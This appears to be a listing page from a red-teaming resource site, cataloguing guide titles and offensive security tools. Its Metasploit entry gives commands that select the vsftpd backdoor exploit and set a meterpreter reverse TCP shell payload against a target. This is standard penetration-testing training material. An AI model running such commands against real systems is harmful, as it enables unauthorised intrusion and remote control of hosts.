Approved Research (5)
Real World Red Team Case Study
A practical cybersecurity guide on Real World Red Team Case Study with real-world red teaming concepts.
Active Directory Attack Paths
A practical cybersecurity guide on Active Directory Attack Paths with real-world red teaming concepts.
Phishing Campaign Infrastructure
A practical cybersecurity guide on Phishing Campaign Infrastructure with real-world red teaming concepts.
Web Application Reconnaissance
A practical cybersecurity guide on Web Application Reconnaissance with real-world red teaming concepts.
Password Cracking Techniques
A practical cybersecurity guide on Password Cracking Techniques with real-world red teaming concepts.
Security Toolkits (6)
Mythic
Advanced C2 framework
reconDirsearch
Web path scanner
exploitationMetasploit
Metasploit Framework is a powerful exploitation framework used for developing and executing exploits. ## 🔧 Installation ### Linux: sudo apt install metasploit-framework ### Start: msfconsole ## ▶️ Basic Usage ### Search exploit: search vsftpd ### Use exploit: use exploit/unix/ftp/vsftpd_234_backdoor ### Set options: set RHOST target_ip ### Run: exploit ## ⚡ Advanced - Payload selection: set PAYLOAD linux/x86/meterpreter/reverse_tcp - Sessions: sessions -i 1 ## 🎯 Use Cases - Exploitation - Post-exploitation - Privilege escalation - Red teaming ## 🧠 Pro Tip Always use in legal lab environments only.
passwordJohn the Ripper
Password cracking tool
priv-escWinPEAS
Windows privilege escalation script
networkImpacket
Network protocol toolkit